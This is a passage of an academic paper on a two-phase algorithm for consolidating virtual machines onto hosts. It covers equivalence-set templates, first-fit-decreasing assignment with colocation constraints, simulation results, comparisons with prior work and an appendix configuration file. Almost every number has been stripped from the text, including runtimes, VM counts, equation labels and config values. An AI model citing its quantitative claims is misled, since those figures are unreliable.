smallest n number of hosts with one or more vms allocated, and the allocations are valid according to our packing validity function (p) above. min(n) s.t. { n=|c′| ∀cn∈c,v (c)= . the problem with the general bin packing problem is that it is computationally pro- hibitive to compute all possible packing solutions to perform this minimization as the combinations of vm to host mappings explodes. in contrast to previous virtual machine bin packing solutions, our approach first generates a generic, yet optimal solution to a slightly different problem that relaxes the condition that each vm be considered dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. independently or seen as unique in its resource consumption requirements. specifically it determines, for each host, the required allocation count from a finite (read arbitrarily small) enumeration of similar sized vms (vm equivalence sets). this arbitrarily small grouping of similar sized vms is based on partitioning, or clustering vms into equiva- lence sets according to resource consumption size. by relaxing the uniqueness of vms and allowing groups of them to be treated identically in terms of assumed, nominal, resource consumption, an optimal solution to this problem can be found very rapidly using a dynamic programming approach (described in detail in ‘constructing an ideal solution template’). once this generic recipe for vm allocation is determined, it is concretely fulfilled from the actual list of distinct virtual machines being managed by employing a variant of first-fit decreasing (as described in ‘concrete vm allocation fulfillment). the first-fit decreasing approach selects concrete vm instances from the appropriate size peer-groups using a hierarchical multi-objective strategy, which is tunable, by the system operator depending on requirements. this latter multi-objective fulfillment is and integral part of our solution because we respect the notion that bad colocation selections can impair overall system performance. consider for instance the prior research on process colocation scheduling that uses previously measured performance degradations of possible combinations as input to colocation placement decisions to yield the lowest possible co-located degradation (jiang et al., ; jiang, tian & shen, ; tian, jiang & shen, ). this work was improved upon and made more relevant to the class of virtual machine consolidation problems by an approach that enabled an explicit, tunable performance bound in pacman (roytman et al., ) as a goal for consolidation. however, the work in pacman required initial placement to be on lightly consolidated servers (conservative placement in their terminology), for a period of time while observations were made to determine colocation impact characteristics on the vm. the authors of the pacman system used – min as example batch periods for this purpose. in contrast, our goal was to build something that can perform vm consolidation packing almost continuously (every few minutes), with low resource usage. constructing an ideal solution template to construct a template for what the ideal packing solution should look like, our algo- rithm uses a dynamic programming style solution. the first step is to discretize the virtual machines to be packed into a set of equivalence combinations. equivalence here means more or less the same computational requirements. for instance, if one is familiar with the amazon ec instance types, one could consider all instantiations of an ec instance type to be equivalent for the purposes of virtual machine bin packing. in some situations, the size of equivalence sets combinations are known a priori because virtual machines are cloned from templates, or golden master images and then customized for each unique deployment. in general, one can consider our algorithm as ‘‘off-line’’ in bin-packing parlance because we know the sizes of all containers and all objects to be packed prior to running the algorithm. the equivalence set can be represented by an ordered tuple consisting of the largest, per-vm resource consumption parameters from each element in the set. for instance, dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in our experimentation we used the following notation to describe an equivalence set: ‘‘m:: c:: n:: s:: e:: ’’ which describes the set of instances containing gb ram, eight logical cpu cores, two network compute units, a single set holding of two concrete elements (vms) in total. later versions of this software were enhanced to more specifically separate out the network values into a cumulative total, as well as constituent read and write capacity. the same approach was also implemented for disk i/o, but has been omitted from the examples for brevity. in situations where the equivalence sizes are not known ahead of time, one can opt to perform a clustering approach to define equivalence groupings, and thereby limit the groupings to a suitably small number of equivalence combinations so as to make this approach viable. once a cluster is defined using a technique such as k-means clustering one can define the equivalence set to be each vm in the grouping. likewise, the hosts in the cloud data center can be partitioned into equivalence sets. hosts belong to the same equivalence set when any two hosts in the set are considered logically equivalent to each other in terms of capacity. when large cloud providers procure machines, they are often purchased several at a time according to the same specification, thereby lending itself to this approach well. in situations where hosts are not identical machines, system administrators can broadly lump together machines with similar compute capabilities. the algorithm begins by looking at each of the virtual machine equivalence combina- tions and examining the representative capacity. the algorithm then iteratively generates starting sets representing all possible combinations consisting of only virtual machines from the same equivalence (from the set of similarly sized vms) that are viable (would fit logically on the largest host to be filled). the limiting factor that governs the expansion of the starting sets is when the resource requirements grow too large to fit on the largest capacity host. consider the following example of this is unclear: assume the largest capacity host has gb of ram, and the smallest element from an equivalence set of virtual machines, lets call that set the small instances, each require mb of ram. in this case, the starting sets produced from the small instances would be the following trivial generation: ×small, ×small, ×small, and ×small as each set would cumulatively require , , , and , mb of ram, respectively. no larger grouping of small instances would fit on the largest host. these starting sets represent some initial candidate equivalence combinations to consider. naturally, we extend this to include an oversubscription parameter for each resource dimension (ram, cpu, disk i/o, networking i/o, etc.) that allows the resource to be oversubscribed on a per-host basis. from the example above, considering no over- subscription for ram, we would have generated all four of the possible instantiations enumerated. each element in the starting set represents an abstract combination from the small-vm set that could be satisfied by concrete virtual machines that are considered equivalent. we further limit the generation of abstract combinations to ensure that combinations respect each dimension of resource under consideration. for instance, in the running dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. example there might actually only be three abstract combinations generated due to the cumulative i/o or cpu requirements of the abstract grouping as compared to the host capacity. we also limit the abstract combinations to contain no more of an equivalence set than the concrete instances. in other words, we do not generate something like ×small if there are in fact only instances of the small vm size to be packed. the algorithm proceeds through each vm equivalence set (e.g., micro, small, medium, lg, xl, xxl, qxl) generating all possible combinations of abstract vms that could reside on the largest host on the network. this process of creating starting sets, when used with a relatively small number of equivalence sets (the order of or so), completes virtually instantaneously on modern machines. the number of starting sets is on the order of the number of virtual machine categories (equivalence sets provided as input). with the completion of the generation of all abstract starting sets, we rigorously generate the exhaustive permutations of abstract, but viable, packing solutions. expansion proceeds as follows. assume that labels a, b, c, and d are labels for each of the generated equivalence sets. at step the table of combinations could be listed as follows with a row dedicated to each known set where it must be strictly followed that a < b < c < d where the < operator is a standardized comparator, in our case ram consumption: a b c d at the next iteration, each row is combined with all elements below it: a, ab, ac, ad b, bc, bd c, cd d continuing in this fashion on a second iteration: a, ab, ac, ad, abc, abd, acd b, bc, bd, bcd c, cd d and the final iteration yields the complete permutation list: a, ab, ac, ad, abc, abd, acd, abcd b, bc, bd, bcd c, cd d as expected, we get values from the original . this is because we are computing the combinations of p( , )+p( , )+p( , )+p( , ) following the standard p(x,y) dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. meaning ‘‘permutations of x values by choosing y elements.’’ this is because, strictly speaking, virtual machine packing is a permutation problem not a combination problem since the meaning of a generic assignment solution that says: ‘‘ large vms and small vm’’ is semantically identical to ‘‘ small vm and large vms.’’ order does not matter, and repeats are not possible. in reality we do not have single elements on each starting row however we have the starting sets expanded from the singleton abstract vms. each of the starting sets’ elements are combined with every element not from its own starting set modulo invalid permutations. invalid permutations limit the state expansion due to the limitation that candidate permutations must remain dimensionally smaller than the largest host (note that smaller here means that the candidate solution permutation must be constrained by each compute resource dimension being observed). we compute the exhaustive solution of abstract permutations using a dynamic programming approach. by sorting the list of candidate solution recipes hierarchically as they are generated (for instance by cumulative memory requirement, then by cumulative cpu capacity required, etc.) we can eliminate much of the needless state expansion in computing all possible combinations through short circuit evaluation. the general worst-case runtime of computing bin-packing solutions, via an exhaustive computation of vm to host mapping possibilities is shown in eq. ( ): o ( n ) ( ) where n is the number of vms and k is the number of host servers. instead, we compute something with complexity: o ( n∑ i= n! (n−i)! ) . ( ) in eq. ( ), we can see runtime of permutation combination based on virtual machine placement equivalence. in eq. ( ), n is the size of the set of equivalence combinations (in other words the number of vm instance types in amazon parlance), and i is simply the counter from to n. alternatively, we could consider that this approach runs in time: o ( nk ) . ( ) equation ( ) is an example of a second formulation of the runtime of permutation computation based on virtual machine placement equivalence. in eq. ( ), the value of n here is once more the size of the set of equivalence permutations (i.e., the number of vm instance types from amazon). since we know that the n here is strictly speaking a much smaller value than the n from eq. ( ) the base improvement shows a potential for speedup assuming k is greater than or equal to . considering that the exponent term in eq. ( ) is a constant value of rather than the size of the number of hosts as compared to the exponent in eq. ( ), this comparison of exponential terms suggests a massive speedup in computation time for the abstract solution as compared to the exhaustive concrete dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. solution for all situations where the data center has more than two hosts. the resulting implication is that the ability to compute the general form of a vm packing solution, if not the exact solution in light of equivalence partitions among the virtual machines is a reasonable strategy to pursue. note that during our experimentation we sorted the generated candidate solutions primarily on memory as it is shown in the literature to be the principal limiting factor in virtual machine consolidation (tulloch, ; vmware, inc, ). the approach of generating the candidate recipe of what the ideal vm to host mapping solution should look like in the abstract is substantially faster than computing all possible concrete combinations of virtual machine assignments. note that, at this point, when abstract solution generation is complete we are left with only a partial solution to the vm consolidation problem that informs us of what the ideal consolidation should look like in the abstract (e.g., ×small, ×medium, ×xl). however, as we will see in the next section, the choice to defer the actual runtime solution of concrete vm assignment to a second processing phase is advantageous. concrete vm allocation fulfillment after phase one is complete and all candidate equivalence combinations have been generated, we now proceed to the concrete assignment phase. in this phase we begin by iterating through the list of hardware hosts. the list of hardware hosts is sorted in largest to smallest capacity. we iterate through the sorted list of largest to smallest equivalence set permutations, assigning the first permutation that is satisfiable by the remaining, unassigned concrete vm instances. in essence this makes our algorithm a derivative of first-fit decreasing since we always fill the ‘‘largest’’ hosts first, with the ‘‘largest’’ equivalent set it can hold. once an equivalence set is found that fits the host being filled, the satisfier tries to locate concrete vm instances according to that equivalence set specification. if the set is not satisfiable (i.e., the equivalence set selected indicated large vms and there are only remaining) we simply remove the candidate set from the list, and advance to the next ‘‘largest’’ candidate equivalence set. note that largest here means the biggest according to our multi-objective comparator function used to sort the lists prior to satisfaction time. in the assignment phase of consolidation, we have a roadmap for what the ideal consolidation should look like, but we still need to assign concrete virtual machine instances to each host that are representative of the plan. to do this, in theory, we could simply select any vm from the equivalence set specification (i.e., any small vm is as good as any other). however, in practice we opt to use this opportunity to fulfill some hard and soft colocation/anti-colocation preferences expressed in vm contracts. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. listing : example virtual machine definition with contract extensions. the colocation_constraints block demonstrates a single blacklisted host along with vms for preferential colocation if possible. <contract id="ubuntuvm"> <ruleset type="vmm-libvirt"> <domain type="kvm"> <name>ubuntu</name> <uuid> c e f- a -c - -f d b ec </uuid> <memory> </memory> <currentmemory> </currentmemory> <vcpu> </vcpu> <os> <type arch=’x _ ’ machine=’pc’>hvm</type> <boot dev=’hd’/> </os> <features> <acpi/> </features> <clock offset=’utc’/> <on_poweroff>destroy</on_poweroff> <on_reboot>restart</on_reboot> <on_crash>destroy</on_crash> <devices> <emulator>/usr/bin/kvm</emulator> <disk type=’file’ device=’disk’> <source file= ’/home/deshantm/ubuntu-kvm/disk .qcow ’/> <target dev=’hda’ bus=’ide’/> </disk> <interface type=’network’> <mac address=’ : : : : :a ’/> <source network=’default’/> <model type=’virtio’/> </interface> <input type=’mouse’ bus=’ps ’/> <graphics type=’vnc’ port=’- ’ autoport=’yes’ listen=’ . . . ’/> </devices> </domain> </ruleset> <vmclassifier> <workload type=’cpu’/> </vmclassifier> <colocation_constraints> <blacklisted_colocation hosts= ’f d fae- dec- d -a - a c e b ’/> <preferential_colocation vms= ‘ b e- ac - d -ae d-b e ac f, a e e -a a - -b - f d b e ’/> </colocation_constraints> dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for instance, when selecting virtual machines we use a per-vm index of preferential colocation candidates and a per-vm set of anti-colocation constraints at satisfaction time. anti-colocation are resolved first as they are considered a hard requirement, while colocation, or affinity preferences, are considered optional and satisfied when possible given the other firm constraints. another aspect of our methodology is that we can then attempt more sophisticated placement systems such as load balancing across the consolidated hypervisors by using the actual runtime resource consumption of each virtual machine rather than just the nominal resource consumption maximums attributed to the equivalence group to which they belong. listing shows an example of a colocation constraint embedded in a virtual machine definition file for kvm as used in this research. an overall review of our two-phased decomposition of the virtual machine bin packing problem can be seen in algorithm . algorithm : two-phase decomposition of the vm bin-packing wherein physical compute resource constraints are resolved in an abstract solution phase and colocation constraints are resolved during the second phase of concrete vm assignment. consolidate (maxhost, {md}, {v}, {h}) enumerate equivalence sets {e} from the set of all vms {v} by method {e}=e({v}) expand singletons into singleton permutations: foreach i= to |{e}|do foreach abstract combination element e∈ei do {se}= singletonexpansion(e) append (ei,{se}) compute all permutations {p} over every element in {se}: for i= to |{se}|do p(|{se}|,i) considering all measured dimensions d,d ∈ {md}, discarding each permutation p ∈ {p} where size (pd) > capacity of the largest host (maxhost) on dimension d (maxhost(d)). apply first-fit decreasing algorithm with the set of hosts {h} as bins, and {p} as the elements to pack to determine a candidate allocation of abstract, equivalent vms to a host: if an element p∈ {p} is satisfiable by a single solution s then apply s. else if a set of elements {c} satisfy p ∈ {p}, then apply greedy heuristics for anti- colocation and colocation to select a concrete set of virtual machines c ∈ {c} note: the sub-steps in can be performed in such a way as to not generate invalid permutations and thereby reduce resource consumption at runtime. results to implement our algorithm, we began by outlining a small but efficient set of structures to encapsulate the state of a virtual machine based cloud datacenter. we implemented our software in the c programming language, using structs for objects representing the hard- ware machines and their physical limitations, as well as structs to represent the abstract virtual machines (something with a multidimensional size but no concrete identifier or dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. placement constraints attached). we also used a structure to represent equivalence sets, which were named lists of abstract vms with aggregate resource requirements. in total, the source code was just under , lines of commented c code as determined by the linux wc utility. once the vm and host information has been loaded from the preference file that describes the cloud to be modeled, the algorithm proceeds by enumerating all of the viable permutations of a single instance type. for instance, with the micro sized equivalence group modeled after amazon’s micro instance our enumeration of single- instance permutation would likely begin with the output as shown in listing . listing : example singleton permutation construction. [(micro: x )-m:: c:: n:: s:: e:: ] [(micro: x )-m:: c:: n:: s:: e:: ] [(micro: x )-m:: c:: n:: s:: e:: ] [...truncated for brevity ...] [(micro: x )-m:: c:: n:: s:: e:: ] [(small: x )-m:: c:: n:: s:: e:: ] [(small: x )-m:: c:: n:: s:: e:: ] [...truncated for brevity ...] [(qxl: x )-m:: c:: n:: s:: e:: ] the format is simply saying the singleton type is micro, the ×n notation indicates the number of instances, and the m, c, n, s, and e values represent the size of each of the memory, cpu, network, the number of sets in this combination (always in a singleton set), and the number of concrete vm elements making up the set. note, for simplicity of explanation, the dimension weights have been simplified to small, integer values. the listing might further continue for some time depending on the maximum capacity of the largest host or the maximum number of micro vm instances before continuing on to the small sized vms. as an example of performance of our two-phased approach to solution generation for vm bin-packing, we performed a variety of experiments using a custom written virtual machine-based data center simulator. our simulator is a linux-based c program written to model various servers of varying physical capacities along the resource dimensions studied herein (nic, ram, cpu, etc...) along with virtual machines of varying sizes with per dimension resource over-constraint parameters and oversubscription detection/pre- vention on a per-resource basis. all simulator development and experimental validation was performed on ibm r© blade center blades, each with -core cpus and gb ram and later runs were repeated, on a macbook pro with gb ram. a simple xml configuration file specifying the virtual machines and hosts to be managed during the simulation governs the simulator. an example this configuration file is shown in the appendix. the configuration file inputs include the per-resource over-constraint value. overcommit is the oversubscription or over-allocation of resources to virtual machines dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of vms across seven equivalence sets from a representative moderate-scale ex- periment. vm equivalence set name concrete vm count micro small medium large xl dxl qxl with respect to the physical hosts maximum allocation of a particular resource. as an example, setting memory overcommit to means a : ratio of allowed cumulative vm memory consumption to the hosts physical ram. similarly, setting a cpu overcommit value of indicates scheduling up to two virtual cpu cores. decimal or floating-point values greater than one are accepted as valid inputs. in addition the configuration file for the simulation requires information about the largest host capacity for each measured resource, used for short circuit analysis when constructing abstract equivalence sets. in other words, the simulator enforces that no abstract solution is generated that has a cumulative individual resource consumption that exceeds the largest available host resource availability, for that resource (considering the previously specified over- constraint values for that resource). lastly, the configuration file shown in appendix includes information about the number of concurrent inbound and concurrent outbound migrations allowed as well as a cumulative migration maximum threshold per host. these migration threshold values are used for final solution post-processing that determines an automated live-migration based rearrangement plan to achieve a packed solution from an arbitrary starting state (vm to host allocation). the approach uses our previously described approach based on the well studied a∗ search algorithm to determine an automated migration plan (dow & matthews, ). in a sample experiment that consisted of expanding a grouping of concrete virtual machines as allocated according to table , we generated , , valid assignment permutations during the expansion phase (converting starting sets into all sets) in just s of wall clock time. a further s of wall clock time was used to perform final result sorting. a larger scale experimental parameterization is shown in table . during this exper- iment we performed a simulation of a large-scale cloud data center with , vms. in this larger scale experiment, there were starting sets generated, to ultimately create , , permutations, taking just over s to compute. a further s of wall clock time were required to sort the final output for concrete assignment. sorting optimizations were not investigated, though they contributed more than % of our overall solution runtime. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of vms across seven equivalence sets from a representative large-scale experi- ment. vm equivalence set name concrete vm count micro , small , medium , large , xl dxl qxl in both experiments, we chose a distribution more heavily weighted towards the virtual machine sizes that the author has encountered during many years of professional and academic creation of vms for cloud computing. based on the author’s own practical experience in corporate vm creation and management for over a decade, it is apparent that many virtual machines begin their existence as a proof-of-concept system, generally sized as small as possible thus many are simply sized small at creation time. further, we chose this size skew because virtual machines that require high levels of resources such as ram or cpu are often selected for migration to dedicated hardware (often as the result of latency or performance reasons). likewise, we argue that virtual machine-based data center operators, do not tend to create data centers consisting only of massively over- configured hosts. thus, our experiments were targeted along a set of experiments fitting with our own empirical observations of cloud data centers. we should note however that our simulator does not stipulate any requirements on the number of vms simulate or the nominal host capacities represented, thus more extreme simulations can indeed be performed. an example of the configuration file used to perform the experiments can be seen in appendix. this configuration file format has proven to be expressive enough to run a variety of simulations during the course of this research. our approach is unique in that it is based on an algorithm with complexity and runtime growth governed by the number of hosts and vms, but substantially mitigated using an intermediate partial solution that is governed by the number of distinct group- ings of equivalent sized virtual machines (the classifications of virtual machine types) used in the system. while this algorithm may indeed break down for exceedingly large numbers of hosts (perhaps or , hosts), we maintain that our goals are for the autonomous management of small to medium sized data centers that we consider to be well in the operational range of our solution. we have not simulated data centers beyond the maximum configuration reported here. this is in part because there will always be some degree of reservation regarding our use of simulation software rather than real data center hardware, rendering further experimentation subject to those same criticisms. we submit that vm management research should not be the bastion of private industry researchers with privileged access to that exorbitantly expensive class of hardware and production virtual machines and did what we could with the resources dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. available to us. secondly, we limited the reach of our simulations because we have no empirical data sets for sizing the virtual machine distribution across a data center that size beyond those that we reported. unsurprisingly, various cloud virtual machine providers rejected a plurality of requests for that sort of information. not only has targeting this class of data center proved to be computationally tractable from a fully autonomous management perspective, but this class of data center are those that are much less likely to opt for exorbitant hardware capital expense needed to maintain performance while achieving consolidation (i.e., they want to consolidate to save money, and are generally less equipped with operational staff to manually check each migration operation if using live migration based consolidation. effectively, this class of user and data center are the users who need a lightweight, autonomous solution the most. formal comparisons to other vm-based cloud management systems are difficult in this type of research because this work was simulated while other published results may be run on other proprietary simulators or on real hardware. additionally, it is notable that systems that perform bin packing of vms do not generally open source or otherwise license their source code for no cost, and thus requiring black box reimplementation of described algorithms in order to perform meaningful comparisons. even under clean room implementation cases, one is never sure if the original authors used tweaks or modifications etc., which would render a clean room implementation comparison meaningless. with respect to published values of vm’s packed as a function of time taken to perform the packing, we present our results as compared to those of ferdaus et al. ( ) in their work using an ant colony optimization based on vector algebra. their experiments were performed on a smaller scale but roughly comparable server with respect to single core cpu speed. our approach is not threaded, and we were unable to determine from a careful reading of their paper if their solution was. their work is presented, similarly to our own, by using simulation. while they solve bin packing in a completely different approach to ours, they find their results favorable when compared to approaches like genetic algorithms. however, this improvement upon, or parity with their work can be considered a reasonable benchmark of success based on the literature. their results extrapolated from their fig. along with their surrounding text would at first glance appear much better than our own. we readily admit that our solution seemingly performs much worse for small-scale experiments as described in our table . as evidence of this, consider that our own packing solution for virtual machines took s in total while their comparable results reportedly took close to s to compute. their results are surely impressive for these small cases! however, it is our opinion that for these small cases of managed vms, either of our algorithms might be suitable for effectively continuous online application. however, their largest scale result includes only , virtual machines and took ‘‘around s on average.’’ in contrast, our largest simulation results involved , vms and completed in s. the only viable way to compare our results is to extrap- olate by optimistically assuming their results scale linearly in the number of vms (which ferdaus et al. explicitly admit is not the case stating ‘‘it is observed that computation time increases non-linearly with the number of vms with small gradient’’). using this dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. optimistic extrapolation, we paint their work in the best possible light and attempt to perform a meaningful comparison to our own work. if we assume their results suggest a management rate of vms/sec (derived from their published values reporting , vms managed in s) their algorithm on a , vm problem set would yield around s run time that would hypothetically, but optimistically, exceed our own by % (or s). while these numbers do not provide conclusive superiority of one technique over the other, they do seem comparable. their analysis includes remarks that their results perform better than ffd based approaches, and a sizeable portion of our concrete assignment computation is based on a type of ffd derived technique which may explain much of their performance benefit especially in the scenarios with a small number of managed vms. in addition, we submit that their solution only considers, ‘‘cpu, memory, and network i/o as relevant server resources in the context of vm consolidation’’ while ours considers cpu, memory, aggregate network i/o as well as cumulative network read i/o and cumulative network write i/o as well as network read/write/aggregate i/o. in addition we support preferential colocation and anti-colocation constraints that their solution does not handle at present. in summation of this section, our work performs comparably when extrapolating to the results of ferdaus et al. ( ) in as favorable a means as possible while our reported results handled more resource dimensions, and included arguably necessary resources like colocation and anti-colocation for viable pro- duction systems. lastly our work may be seen as preferable for production deployment based on the deterministic nature of our solution while the approach taken by ferdaus et al. is probabilistic. we conclude our comparative analysis to other known works in the field by comparing our work to a recent paper from hwang & pedram ( ). while they also take a hierar- chical approach to virtual machine consolidation, using simulation for their published results, we note the following differences between our respective works. first, hwang and pedram decompose the problem in a slightly different way, opting for decomposition with a global manager that places vms into clusters or functional groups, along with a local manager that assigns vms to hosts within a given cluster. our highest-level hierarchy is grouping vms not based on cluster functionality but rather on their instance type or equivalence set. the second major difference of note is that their approach is heuristic in nature and appears to be based on a modified ffd algorithm that considers an aggregate of the free resources available as the term for greedy selection. our work is hierarchical in that once a generic instance-type allocation has been prescribed, the concrete assignment phase hierarchically uses a type of ffd that descends through an a priori ordered list of resource dimensions and colocation/anti-colocation criteria to be used as tie-breakers for greedy selection. thus, the ffd greedy selection criterion hierarchy is only used as needed. their work seemingly does not consider colocation or anti-colocation considerations. comparing to their results, we can rely on the single published reference of concrete runtimes, fig. in their work. note the remaining figures they have included are presented as normalized runtimes for comparative purposes. through email correspondence, the author of this work has confirmed the label in their fig. is incorrectly identified with a label of ‘‘seconds,’’ when it should in fact be labeled dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘microseconds’’. referring concretely to their fig. , the best-case run time for packing management of , vms is∼ . ∗ microseconds ( s) using a window size of . their worst case published run time with a window size for the management of , vms is s ( . min). as you will recall from earlier in this section, our solution for a vm packing problem that was four times as large ( , vms) took under two minutes. once more we extrapolate using an optimistic linear extrapolation to a problem size of × and we estimate optimistically that pedram and hwan’s solution for a comparable problem size would take s in the best case. it is is evident that a linear extrapolation is generous for comparative purposes as their results show a decidedly non-linear run- time increase covering , , , , , and , vm cases varied across each of their sliding window size selections. in their worst-case results (sliding window size of ) using the same optimistic × extrapolation, we optimistically conclude an estimated lower- bound runtime would be approximately s (which is, coincidentally, our empirically measured value for , vm problem set). we conclude that our algorithm performs slower than pedram and hwang’s best-case published solution when extrapolated optimistically for the∼ , vm problem size, but performs comparably to their worst- case solution when extrapolating though our solution considers location constraints that theirs does not. accounting for generous extrapolations, we expect our solution would perform comparably, if not better, in practice for larger problem sizes while accounting for colocation and anti-colocation that their solution seemingly does not handle. conclusions and next steps our results show that decomposing the problem of virtual machine consolidation in cloud computing data centers into an abstract solution phase and a concrete fulfillment stage is advantageous in that it is easy to implement, allows satisfaction of multiple resource constraints, provides an easy means for implementing oversubscription sup- port, as well enabling a straightforward approach to colocation and anti-colocation requirements with very reasonable runtimes (under s) for moderate numbers of virtual machines ( , vms). in this way we can make use of observations data, if available, during the second phase of concrete assignment to improve placement decisions. these results compare favorably to the published literature from ferdaus et al. as well as the work of hwang and pedram. however we tender these comparisons loosely, given the different motivations of the work, as well as the different problem set sizes used in the various publications and the requisite need to extrapolate in our effort for meaningful comparison. further, it is apparent that our ongoing work should investigate potential sorting optimization to ameliorate the sorting activity that dominated our runtime profile. while the work of roytman et al. ( ) demonstrated one means for performance characterization of potential consolidation impacts by using a staging area for new virtual machines, our research group believes that online detection of poor placement or colocation decisions should be a separate process architecturally. furthermore, we believe the process of vm placement will eventually move to a fully dynamic and continuous dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. system that operates at the data center scale. live-guest migration and fast networking technologies are beginning to show the promise of extremely short and non-disruptive live-migrations for even large-scale enterprise sized virtual machines. we are therefore working on an on-line, machine-learning-based (dow, ) system to perform the task of detecting poor colocation decisions as a remedial effort for continuous cloud-scale vm rebalancing. we believe this work will complement the rapid consolidation planning implementation we have outlined here. it is our assertion that evidence-based vm continuous placement adjustment decisions will become the nominal operational reality for iaas virtual machine clouds. the desire to pack vm’s expediently stems from implications regarding server power consumption in heterogeneous compute clouds. fan, weber & barroso ( ), describe the covariant relationship between cpu usage and server power consumption as a linear relationship between power consumption of the server and the increase of cpu utilization. the range of this covariance extends from virtually idle through fully utilized states. p(u)=pidle+(pbusy−pidle)∗u. ( ) equation ( ) shows a linear model of power estimation based on cpu and idle power consumption. in eq. ( ), p is the estimated power consumption, while pidle is the power consumption of an idle server, and with pbusy as the power consumption of a fully utilized server. the value u is the instantaneous present cpu utilization of the host. their work demonstrates that using this simple linear model, one can estimate the future power consumption of a server with error below %. they further proposed empirical, nonlinear, model is as shown in eq. ( ): p(u)=pidle+(pbusy−pidle)( u−u r). ( ) equation ( ) shows an improved empirical model of power estimation based on cal- ibration experimentation. in eq. ( ), the parameter r is an experimentally obtained calibration parameter that minimizes the square error for the given class of host hardware. to use this formula, each class of host hardware must undergo a set of calibration experiments to generate the value of r that tunes the model. their work, which spans thousands of nodes under different types of workloads, demonstrates a prediction error below % for a tuned empirical model. using the results from fan et al., it may be possible to treat hosts as equivalent resources in the same fashion as virtual machines are considered equivalent in this work. it is interesting to note that the previously mentioned work of ferdaus et al. also uses the same general formulation for modeling power consumption in their fig. as shown above. this lends some degree of consensus to the adoption of this relatively straightforward approach for modeling power consumption of virtual machines. the approach envisioned makes the assumption that one could use the ‘‘smallest’’ hardware resource capacity vector from a set of hosts that have been arbitrarily clustered, perhaps through k-means or similar clustering approaches) by their power consumption dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. estimation formulas (eqs. ( ) and ( ) in this work). this work seems a logical follow on and a reasonable next step to investigate. appendix: simulation configuration file hardware # the total number of physical host servers to be modeled max_simulated_servers= #the largest server ram allocation present in the cloud (largest server ram in mb) max_server_ram_size= #the largest smallest ram allocation present in the cloud (smallest server ram in mb) min_server_ram_size= # the largest server cpu allocation present in the cloud (number of hardware cores) max_server_cpu_size= #the largest smallest ram allocation present in the cloud (smallest server ram in mb) min_server_cpu_size= # the largest server net allocation present in the cloud (in gb/sec) max_server_net_size= # the largest server net rx allocation present in the cloud (in gb/sec) max_server_net_rx_size= # the largest server net tx allocation present in the cloud (in gb/sec) max_server_net_tx_size= # the largest server io allocation present in the cloud (in gb/sec) max_server_io_size= # the largest server io read allocation present in the cloud (in gb/sec) max_server_io_read_size= # the largest server io write allocation present in the cloud (in gb/sec) max_server_io_write_size= overcommit # overcommit is the oversubscription or overallocation of resources to virtual machines # with respect to the physical hosts maximum allocation of a particular resource. # dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. # as an example, setting memory overcommit to means a : ratio of allowed cumulative # vm memory consumption to the hosts physical ram. # # setting a cpu overcommit value of indicates scheduling up to virtual cpu cores # per single physical cpu core on the host. # # note: values should always be or greater... mem_overcommit_ratio= cpu_overcommit_ratio= net_overcommit_ratio= net_rx_overcommit_ratio= net_tx_overcommit_ratio= io_overcommit_ratio= io_read_overcommit_ratio= io_write_overcommit_ratio= virtual machines # the number of micro sized virtual machines micro= # the number of small sized virtual machines small= # the number of medium sized virtual machines medium= # the number of large sized virtual machines large= # the number of extra large sized virtual machines xl= # the number of double extra large sized virtual machines dxl= # the number of quadruple extra large sized virtual machines qxl= migration plans # the maximum possible inbound migrations per host (for bandwidth limiting or cpu concerns with parallel migrations) dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. max_concurrent_inbound_migrations_per_host= # the maximum possible outbound migrations per host # (for bandwidth limiting or cpu concerns with parallel migrations) max_concurrent_outbound_migrations_per_host= # the maximum possible cumulative inbound and outbound migrations per host # (for situations where the above alone will not tell the whole story of hypervisor impact) max_concurrent_overall_migrations_per_host= additional information and declarations funding the author received no funding for this work. competing interests eli m. dow is an employee of ibm research. author contributions • eli m. dow conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: research performed in support of this publication did not generate appreciable or generally useful raw data beyond the comparative summary statistics reported herein. references campegiani p. . a genetic algorithm to solve the virtual machines resources allo- cation problem in multi-tier distributed systems. in: second international workshop on virtualization performance: analysis, characterization, and tools (vpact ). available at http://www.paolocampegiani.it/vpact.pdf . campegiani p, lo presti f. . a general model for virtual machines resources allocation in multi-tier distributed systems. in: autonomic and autonomous systems, . icas’ . piscataway: ieee, – . dow em. . inciting cloud virtual machine reallocation with supervised machine learning and time series forecasts. in: proceedings of the enterprise compute conference (ecc). available at https://ecc.marist.edu/conf /pres/dowincite-presentation- ecc .pdf . dow em, matthews n. . virtual machine migration plan generation through a∗ search. in: cloud networking (cloudnet), ieee th international conference on cloud networking. piscataway: ieee, – . dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.paolocampegiani.it/vpact.pdf https://ecc.marist.edu/conf 